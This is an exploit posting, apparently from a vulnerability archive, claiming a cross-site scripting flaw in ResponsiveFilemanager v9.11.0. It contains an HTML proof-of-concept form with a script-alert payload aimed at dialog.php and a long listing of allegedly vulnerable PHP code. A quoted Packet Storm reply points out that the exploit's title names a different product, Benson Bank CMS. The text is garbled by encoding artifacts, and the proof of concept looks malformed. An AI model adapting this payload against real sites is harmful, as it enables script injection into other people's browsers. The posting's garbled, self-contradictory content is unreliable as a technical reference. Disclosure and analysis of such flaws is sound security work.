`*=============================================================|
| Exploit Title: ResponsiveFilemanager Cross Site Scripting
|
| Exploit Author: Ashiyane Digital Security Team
|
| Vendor Homepage: http://www.responsivefilemanager.com/
|
| Download Link : https://github.com/trippo/ResponsiveFilemanager/archive/master.zip
|
| Version : v9.11.0
|
| Tested on: Kali Linux
|
| Date: 1 /10 / 2017
*=============================================================|
| Exploit Code:
|
|<HTML>
|<HEAD>
|A A A <TITLE>ResponsiveFilemanage Cross Site Scripting</TITLE>
|</HEAD>
|<BODY>
|<form action="http://127.0.0.1/7/ResponsiveFilemanager-master/filemanager/dialog.php" method="get">
| <input type="hidden" id="current_url" value="akey=key&crossdomain=0&editor=0&field_id=&fldr=/&lang=en_EN"><script>alert('M.R.S.L.Y')</script>&popup=0&relative_url=0&type=0"/>
|</form>
|</BODY>
|</HTML>
*=======================|
|How to fix this vulnerability :
|
|You should first try to f.ilter all input variables O After use command echo in script :)
|
*=======================|
|Vulnerable code :
|
|<body>
|A A A <input type="hidden" id="ftp" value="<?php echo !!$ftp; ?>" />
|A A A <input type="hidden" id="popup" value="<?php echo $popup;?>" />
|A A A <input type="hidden" id="callback" value="<?php echo $callback; ?>" />A A A
|A A A <input type="hidden" id="crossdomain" value="<?php echo $crossdomain;?>" />
|A A A <input type="hidden" id="editor" value="<?php echo $editor;?>" />
|A A A <input type="hidden" id="view" value="<?php echo $view;?>" />
|A A A <input type="hidden" id="subdir" value="<?php echo $subdir;?>" />
|A A A <input type="hidden" id="field_id" value="<?php echo $field_id;?>" />
|A A A <input type="hidden" id="type_param" value="<?php echo $type_param;?>" />
|A A A <input type="hidden" id="upload_dir" value="<?php echo $upload_dir;?>" />
|A A A <input type="hidden" id="cur_dir" value="<?php echo $cur_dir;?>" />
|A A A <input type="hidden" id="cur_dir_thumb" value="<?php echo $thumbs_path.$subdir;?>" />
|A A A <input type="hidden" id="insert_folder_name" value="<?php echo trans('Insert_Folder_Name');?>" />
|A A A <input type="hidden" id="new_folder" value="<?php echo trans('New_Folder');?>" />
|A A A <input type="hidden" id="ok" value="<?php echo trans('OK');?>" />
|A A A <input type="hidden" id="cancel" value="<?php echo trans('Cancel');?>" />
|A A A <input type="hidden" id="rename" value="<?php echo trans('Rename');?>" />
|A A A <input type="hidden" id="lang_duplicate" value="<?php echo trans('Duplicate');?>" />
|A A A <input type="hidden" id="duplicate" value="<?php if($duplicate_files) echo 1; else echo 0;?>" />
|A A A <input type="hidden" id="base_url" value="<?php echo $base_url?>"/>
|A A A <input type="hidden" id="ftp_base_url" value="<?php echo $ftp_base_url?>"/>
|A A A <input type="hidden" id="fldr_value" value="<?php echo $subdir;?>"/>
|A A A <input type="hidden" id="sub_folder" value="<?php echo $rfm_subfolder;?>"/>
|A A A <input type="hidden" id="return_relative_url" value="<?php echo $return_relative_url == true ? 1 : 0;?>"/>
|A A A <input type="hidden" id="lazy_loading_file_number_threshold" value="<?php echo $lazy_loading_file_number_threshold?>"/>
|A A A <input type="hidden" id="file_number_limit_js" value="<?php echo $file_number_limit_js;?>" />
|A A A <input type="hidden" id="sort_by" value="<?php echo $sort_by;?>" />
|A A A <input type="hidden" id="descending" value="<?php echo $descending?1:0;?>" />
|A A A <input type="hidden" id="current_url" value="<?php echo str_replace(array('&******='.$******,'&sort_by='.$sort_by,'&descending='.intval($descending)),array(''),$base_url.$_SERVER['REQUEST_URI']);?>" />
|A A A <input type="hidden" id="lang_show_url" value="<?php echo trans('Show_url');?>" />
|A A A <input type="hidden" id="copy_cut_files_allowed" value="<?php if($copy_cut_files) echo 1; else echo 0;?>" />
|A A A <input type="hidden" id="copy_cut_dirs_allowed" value="<?php if($copy_cut_dirs) echo 1; else echo 0;?>" />
|A A A <input type="hidden" id="copy_cut_max_size" value="<?php echo $copy_cut_max_size;?>" />
|A A A <input type="hidden" id="copy_cut_max_count" value="<?php echo $copy_cut_max_count;?>" />
|A A A <input type="hidden" id="lang_copy" value="<?php echo trans('Copy');?>" />
|A A A <input type="hidden" id="lang_cut" value="<?php echo trans('Cut');?>" />
|A A A <input type="hidden" id="lang_paste" value="<?php echo trans('Paste');?>" />
|A A A <input type="hidden" id="lang_paste_here" value="<?php echo trans('Paste_Here');?>" />
|A A A <input type="hidden" id="lang_paste_confirm" value="<?php echo trans('Paste_Confirm');?>" />
|A A A <input type="hidden" id="lang_files" value="<?php echo trans('Files');?>" />
|A A A <input type="hidden" id="lang_folders" value="<?php echo trans('Folders');?>" />
|A A A <input type="hidden" id="lang_files_on_clipboard" value="<?php echo trans('Files_ON_Clipboard');?>" />
|A A A <input type="hidden" id="clipboard" value="<?php echo ((isset($_SESSION['RF']['clipboard']['path']) && trim($_SESSION['RF']['clipboard']['path']) != null) ? 1 : 0);?>" />
|A A A <input type="hidden" id="lang_clear_clipboard_confirm" value="<?php echo trans('Clear_Clipboard_Confirm');?>" />
|A A A <input type="hidden" id="lang_file_permission" value="<?php echo trans('File_Permission');?>" />
|A A A <input type="hidden" id="chmod_files_allowed" value="<?php if($chmod_files) echo 1; else echo 0;?>" />
|A A A <input type="hidden" id="chmod_dirs_allowed" value="<?php if($chmod_dirs) echo 1; else echo 0;?>" />
|A A A <input type="hidden" id="lang_lang_change" value="<?php echo trans('Lang_Change');?>" />
|A A A <input type="hidden" id="edit_text_files_allowed" value="<?php if($edit_text_files) echo 1; else echo 0;?>" />
|A A A <input type="hidden" id="lang_edit_file" value="<?php echo trans('Edit_File');?>" />
|A A A <input type="hidden" id="lang_new_file" value="<?php echo trans('New_File');?>" />
|A A A <input type="hidden" id="lang_filename" value="<?php echo trans('Filename');?>" />
|A A A <input type="hidden" id="lang_file_info" value="<?php echo fix_strtoupper(trans('File_info'));?>" />
|A A A <input type="hidden" id="lang_edit_image" value="<?php echo trans('Edit_image');?>" />
|A A A <input type="hidden" id="lang_error_upload" value="<?php echo trans('Error_Upload');?>" />
|A A A <input type="hidden" id="lang_select" value="<?php echo trans('Select');?>" />
|A A A <input type="hidden" id="lang_extract" value="<?php echo trans('Extract');?>" />
|A A A <input type="hidden" id="transliteration" value="<?php echo $transliteration?"true":"false";?>" />
|A A A <input type="hidden" id="convert_spaces" value="<?php echo $convert_spaces?"true":"false";?>" />
|A A A <input type="hidden" id="replace_with" value="<?php echo $convert_spaces? $replace_with : "";?>" />
|A A A <input type="hidden" id="lower_case" value="<?php echo $lower_case?"true":"false";?>" />
|A A A <input type="hidden" id="show_folder_size" value="<?php echo $show_folder_size;?>" />
|A A A <input type="hidden" id="add_time_to_img" value="<?php echo $add_time_to_img;?>" />
|
*=============================================================|
| Special Thanks To : Ehsan Cod3r O micle O Und3rgr0und O Amir.ght O
| xenotixO modiretO V For Vendetta O Alireza O r4ouf O Spoofer O
| And All Of My Friends O The Last One : My Self, M.R.S.L.YA
*=============================================================|
From: Packet Storm <[email protected]>
To: aaNc Kha! aa <[email protected]>
Sent: Wednesday, 11 January 2017, 6:40:19
Subject: Re: ResponsiveFilemanager Cross Site Scripting
Why does one part say Benson Bank CMS and another ResponsiveFileManager?
On Tue, Jan 10, 2017 at 02:52:42PM +0000, aaNc Kha! aa wrote:
> *=============================================================|
> |A ExploitA Title:A ResponsiveFilemanagerA CrossA SiteA Scripting
> |
> |A ExploitA Author:A AshiyaneA DigitalA SecurityA Team
> |
> |A VendorA Homepage:A http://www.responsivefilemanager.com/
> |
> |A DownloadA LinkA :A https://github.com/trippo/ResponsiveFilemanager/archive/master.zip
> |
> |A VersionA :A v9.11.0
> |
> |A TestedA on:A KaliA Linux
> |
> |A Date:A 1A /10A /A 2017
> *=============================================================|
> |A ExploitA Code:
> |
> |<HTML>
> |<HEAD>
> |A A A A <TITLE>BensonA BankA CMSA vA 5.5A -A 2015.09.09A CrossA SiteA Scripting</TITLE>
> |</HEAD>
> |<BODY>
> |<formA action="http://127.0.0.1/7/ResponsiveFilemanager-master/filemanager/dialog.php"A method="get">
> |A <inputA type="hidden"A id="current_url"A value="akey=key&crossdomain=0&editor=0&field_id=&fldr=/&lang=en_EN"><script>alert('M.R.S.L.Y')</script>&popup=0&relative_url=0&type=0"/>
> |</form>
> |</BODY>
> |</HTML>
> *=======================|
> |HowA toA fixA thisA vulnerabilityA :
> |
> |YouA shouldA firstA tryA toA f.ilterA allA inputA variablesA OA AfterA useA commandA echoA inA scriptA :)
> |
> *=======================|
> |VulnerableA codeA :
> |
> |<body>
> |A A A A <inputA type="hidden"A id="ftp"A value="<?phpA echoA !!$ftp;A ?>"A />
> |A A A A <inputA type="hidden"A id="popup"A value="<?phpA echoA $popup;?>"A />
> |A A A A <inputA type="hidden"A id="callback"A value="<?phpA echoA $callback;A ?>"A />A A A A
> |A A A A <inputA type="hidden"A id="crossdomain"A value="<?phpA echoA $crossdomain;?>"A />
> |A A A A <inputA type="hidden"A id="editor"A value="<?phpA echoA $editor;?>"A />
> |A A A A <inputA type="hidden"A id="view"A value="<?phpA echoA $view;?>"A />
> |A A A A <inputA type="hidden"A id="subdir"A value="<?phpA echoA $subdir;?>"A />
> |A A A A <inputA type="hidden"A id="field_id"A value="<?phpA echoA $field_id;?>"A />
> |A A A A <inputA type="hidden"A id="type_param"A value="<?phpA echoA $type_param;?>"A />
> |A A A A <inputA type="hidden"A id="upload_dir"A value="<?phpA echoA $upload_dir;?>"A />
> |A A A A <inputA type="hidden"A id="cur_dir"A value="<?phpA echoA $cur_dir;?>"A />
> |A A A A <inputA type="hidden"A id="cur_dir_thumb"A value="<?phpA echoA $thumbs_path.$subdir;?>"A />
> |A A A A <inputA type="hidden"A id="insert_folder_name"A value="<?phpA echoA trans('Insert_Folder_Name');?>"A />
> |A A A A <inputA type="hidden"A id="new_folder"A value="<?phpA echoA trans('New_Folder');?>"A />
> |A A A A <inputA type="hidden"A id="ok"A value="<?phpA echoA trans('OK');?>"A />
> |A A A A <inputA type="hidden"A id="cancel"A value="<?phpA echoA trans('Cancel');?>"A />
> |A A A A <inputA type="hidden"A id="rename"A value="<?phpA echoA trans('Rename');?>"A />
> |A A A A <inputA type="hidden"A id="lang_duplicate"A value="<?phpA echoA trans('Duplicate');?>"A />
> |A A A A <inputA type="hidden"A id="duplicate"A value="<?phpA if($duplicate_files)A echoA 1;A elseA echoA 0;?>"A />
> |A A A A <inputA type="hidden"A id="base_url"A value="<?phpA echoA $base_url?>"/>
> |A A A A <inputA type="hidden"A id="ftp_base_url"A value="<?phpA echoA $ftp_base_url?>"/>
> |A A A A <inputA type="hidden"A id="fldr_value"A value="<?phpA echoA $subdir;?>"/>
> |A A A A <inputA type="hidden"A id="sub_folder"A value="<?phpA echoA $rfm_subfolder;?>"/>
> |A A A A <inputA type="hidden"A id="return_relative_url"A value="<?phpA echoA $return_relative_urlA ==A trueA ?A 1A :A 0;?>"/>
> |A A A A <inputA type="hidden"A id="lazy_loading_file_number_threshold"A value="<?phpA echoA $lazy_loading_file_number_threshold?>"/>
> |A A A A <inputA type="hidden"A id="file_number_limit_js"A value="<?phpA echoA $file_number_limit_js;?>"A />
> |A A A A <inputA type="hidden"A id="sort_by"A value="<?phpA echoA $sort_by;?>"A />
> |A A A A <inputA type="hidden"A id="descending"A value="<?phpA echoA $descending?1:0;?>"A />
> |A A A A <inputA type="hidden"A id="current_url"A value="<?phpA echoA str_replace(array('&******='.$******,'&sort_by='.$sort_by,'&descending='.intval($descending)),array(''),$base_url.$_SERVER['REQUEST_URI']);?>"A />
> |A A A A <inputA type="hidden"A id="lang_show_url"A value="<?phpA echoA trans('Show_url');?>"A />
> |A A A A <inputA type="hidden"A id="copy_cut_files_allowed"A value="<?phpA if($copy_cut_files)A echoA 1;A elseA echoA 0;?>"A />
> |A A A A <inputA type="hidden"A id="copy_cut_dirs_allowed"A value="<?phpA if($copy_cut_dirs)A echoA 1;A elseA echoA 0;?>"A />
> |A A A A <inputA type="hidden"A id="copy_cut_max_size"A value="<?phpA echoA $copy_cut_max_size;?>"A />
> |A A A A <inputA type="hidden"A id="copy_cut_max_count"A value="<?phpA echoA $copy_cut_max_count;?>"A />
> |A A A A <inputA type="hidden"A id="lang_copy"A value="<?phpA echoA trans('Copy');?>"A />
> |A A A A <inputA type="hidden"A id="lang_cut"A value="<?phpA echoA trans('Cut');?>"A />
> |A A A A <inputA type="hidden"A id="lang_paste"A value="<?phpA echoA trans('Paste');?>"A />
> |A A A A <inputA type="hidden"A id="lang_paste_here"A value="<?phpA echoA trans('Paste_Here');?>"A />
> |A A A A <inputA type="hidden"A id="lang_paste_confirm"A value="<?phpA echoA trans('Paste_Confirm');?>"A />
> |A A A A <inputA type="hidden"A id="lang_files"A value="<?phpA echoA trans('Files');?>"A />
> |A A A A <inputA type="hidden"A id="lang_folders"A value="<?phpA echoA trans('Folders');?>"A />
> |A A A A <inputA type="hidden"A id="lang_files_on_clipboard"A value="<?phpA echoA trans('Files_ON_Clipboard');?>"A />
> |A A A A <inputA type="hidden"A id="clipboard"A value="<?phpA echoA ((isset($_SESSION['RF']['clipboard']['path'])A &&A trim($_SESSION['RF']['clipboard']['path'])A !=A null)A ?A 1A :A 0);?>"A />
> |A A A A <inputA type="hidden"A id="lang_clear_clipboard_confirm"A value="<?phpA echoA trans('Clear_Clipboard_Confirm');?>"A />
> |A A A A <inputA type="hidden"A id="lang_file_permission"A value="<?phpA echoA trans('File_Permission');?>"A />
> |A A A A <inputA type="hidden"A id="chmod_files_allowed"A value="<?phpA if($chmod_files)A echoA 1;A elseA echoA 0;?>"A />
> |A A A A <inputA type="hidden"A id="chmod_dirs_allowed"A value="<?phpA if($chmod_dirs)A echoA 1;A elseA echoA 0;?>"A />
> |A A A A <inputA type="hidden"A id="lang_lang_change"A value="<?phpA echoA trans('Lang_Change');?>"A />
> |A A A A <inputA type="hidden"A id="edit_text_files_allowed"A value="<?phpA if($edit_text_files)A echoA 1;A elseA echoA 0;?>"A />
> |A A A A <inputA type="hidden"A id="lang_edit_file"A value="<?phpA echoA trans('Edit_File');?>"A />
> |A A A A <inputA type="hidden"A id="lang_new_file"A value="<?phpA echoA trans('New_File');?>"A />
> |A A A A <inputA type="hidden"A id="lang_filename"A value="<?phpA echoA trans('Filename');?>"A />
> |A A A A <inputA type="hidden"A id="lang_file_info"A value="<?phpA echoA fix_strtoupper(trans('File_info'));?>"A />
> |A A A A <inputA type="hidden"A id="lang_edit_image"A value="<?phpA echoA trans('Edit_image');?>"A />
> |A A A A <inputA type="hidden"A id="lang_error_upload"A value="<?phpA echoA trans('Error_Upload');?>"A />
> |A A A A <inputA type="hidden"A id="lang_select"A value="<?phpA echoA trans('Select');?>"A />
> |A A A A <inputA type="hidden"A id="lang_extract"A value="<?phpA echoA trans('Extract');?>"A />
> |A A A A <inputA type="hidden"A id="transliteration"A value="<?phpA echoA $transliteration?"true":"false";?>"A />
> |A A A A <inputA type="hidden"A id="convert_spaces"A value="<?phpA echoA $convert_spaces?"true":"false";?>"A />
> |A A A A <inputA type="hidden"A id="replace_with"A value="<?phpA echoA $convert_spaces?A $replace_withA :A "";?>"A />
> |A A A A <inputA type="hidden"A id="lower_case"A value="<?phpA echoA $lower_case?"true":"false";?>"A />
> |A A A A <inputA type="hidden"A id="show_folder_size"A value="<?phpA echoA $show_folder_size;?>"A />
> |A A A A <inputA type="hidden"A id="add_time_to_img"A value="<?phpA echoA $add_time_to_img;?>"A />
> |
> *=============================================================|
> |A SpecialA ThanksA ToA :A EhsanA Cod3rA OA micleA OA Und3rgr0undA OA Amir.ghtA O
> |A xenotixOA modiretOA VA ForA VendettaA OA AlirezaA OA r4oufA OA SpooferA O
> |A AndA AllA OfA MyA FriendsA OA TheA LastA OneA :A MyA Self,A M.R.S.L.YA A
> *=============================================================|
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation